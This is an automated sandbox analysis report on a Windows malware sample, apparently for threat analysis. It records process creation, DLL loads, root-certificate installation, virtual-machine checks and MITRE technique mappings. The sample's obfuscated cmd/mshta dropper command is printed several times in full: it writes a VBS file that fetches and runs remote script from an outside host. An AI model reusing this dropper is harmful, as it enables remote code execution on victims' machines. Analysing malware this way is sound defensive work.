Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: credssp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: imgutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn2.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntdsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected

Data Obfuscation

barindex
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C BlobJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: C:\Windows\SysWOW64\mshta.exe TID: 3588Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3120Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\wscript.exe TID: 3120Thread sleep time: -60000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_BIOS
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
Source: wscript.exe, 0000000B.00000002.518135358.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 R2LGELGELGEY
Source: wscript.exe, 0000000B.00000002.518135358.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 RTMYGGYGGY6 @
Source: wscript.exe, 0000000B.00000002.518135358.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V 2008 Beta or RC0JFPR
Source: wscript.exe, 0000000B.00000002.518135358.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMware Virtual PlatformDIX
Source: wscript.exe, 0000000B.00000002.518135358.00000000006CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-VGJIA
Source: wscript.exe, 0000000B.00000002.518135358.0000000000709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareHIYIL&3
Source: C:\Windows\SysWOW64\mshta.exeMemory protected: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\wscript.exeDomain query: 102.57.205.92.host.secureserver.net
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 92.205.57.102 443Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo|set /p=^"OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="OBFrHQ=".":VXFexowpWNDXfHzvyUCKhL="i":wXWkNnKwYZxgLlPej=":":eHybBjF="g":GetO">C:\Users\Public\cNOV.vbs&echo|set /p=^"bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" set /p="bject("scr"+VXFexowpWNDXfHzvyUCKhL+"pt"+wXWkNnKwYZxgLlPej+"hT"+"Tps"+wXWkNnKwYZxgLlPej+"//102"+OBFrHQ+"57"+OBFrHQ+"205"+OBFrHQ+"92"+OBFrHQ+"host"+OBFrHQ+"secureserver"+OBFrHQ+"net//"+eHybBjF+"1")">>C:\Users\Public\cNOV.vbs&c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /c start C:\Users\Public\cNOV.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\cNOV.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /k echo|set /p=^"obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbsJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="obfrhq=".":vxfexowpwndxfhzvyuckhl="i":wxwknnkwyzxgllpej=":":ehybbjf="g":geto">c:\users\public\cnov.vbs&echo|set /p=^"bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe c:\windows\system32\cmd.exe /s /d /c" set /p="bject("scr"+vxfexowpwndxfhzvyuckhl+"pt"+wxwknnkwyzxgllpej+"ht"+"tps"+wxwknnkwyzxgllpej+"//102"+obfrhq+"57"+obfrhq+"205"+obfrhq+"92"+obfrhq+"host"+obfrhq+"secureserver"+obfrhq+"net//"+ehybbjf+"1")">>c:\users\public\cnov.vbs&c:\windows\system32\cmd.exe /c start c:\users\public\cnov.vbs"Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information111
Scripting
Valid Accounts2
Windows Management Instrumentation
111
Scripting
111
Process Injection
1
Masquerading
OS Credential Dumping11
Security Software Discovery
Remote Services1
Email Collection
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts111
Command and Scripting Interpreter
1
DLL Side-Loading
1
DLL Side-Loading
1
Modify Registry
LSASS Memory2
Virtualization/Sandbox Evasion
Remote Desktop Protocol1
Clipboard Data
2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)2
Virtualization/Sandbox Evasion
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Disable or Modify Tools
NTDS1
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script111
Process Injection
LSA Secrets33
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Deobfuscate/Decode Files or Information
Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Install Root Certificate
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579831 Sample: Archivo-PxFkiLTWYG-23122024... Startdate: 23/12/2024 Architecture: WINDOWS Score: 88 45 static.nl3.vip.prod.criteo.net 2->45 47 static.criteo.net 2->47 63 Sigma detected: Suspicious MSHTA Child Process 2->63 65 Sigma detected: WScript or CScript Dropper 2->65 67 AI detected suspicious sample 2->67 69 3 other signatures 2->69 11 mshta.exe 76 2->11         started        signatures3 process4 dnsIp5 49 securepubads.g.doubleclick.net 142.250.181.130, 443, 49168, 49222 GOOGLEUS United States 11->49 51 s3-r-w.sa-east-1.amazonaws.com 3.5.234.55, 443, 49213 AMAZON-02US United States 11->51 53 5 other IPs or domains 11->53 37 LG-Agosto-01082022...cfd66b2c3a51[1].png, PNG 11->37 dropped 39 4-home-destaque_desk-150a1979940c[1].png, PNG 11->39 dropped 41 3-home-destaque_desk-cc5a6ad015ea[1].png, PNG 11->41 dropped 43 13 other malicious files 11->43 dropped 73 Obfuscated command line found 11->73 75 Installs new ROOT certificates 11->75 77 Writes many files with high entropy 11->77 16 cmd.exe 11->16         started        file6 signatures7 process8 signatures9 59 Obfuscated command line found 16->59 19 cmd.exe 1 16->19         started        23 cmd.exe 16->23         started        process10 file11 35 C:\Users\Public\cNOV.vbs, ASCII 19->35 dropped 71 Command shell drops VBS files 19->71 25 cmd.exe 19->25         started        27 cmd.exe 19->27         started        signatures12 process13 process14 29 cmd.exe 1 25->29         started        process15 31 wscript.exe 11 29->31         started        dnsIp16 55 102.57.205.92.host.secureserver.net 31->55 57 102.57.205.92.host.secureserver.net 92.205.57.102, 443, 49218, 49219 GD-EMEA-DC-SXB1DE Germany 31->57 61 System process connects to network (likely due to code injection or exploit) 31->61 signatures17

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
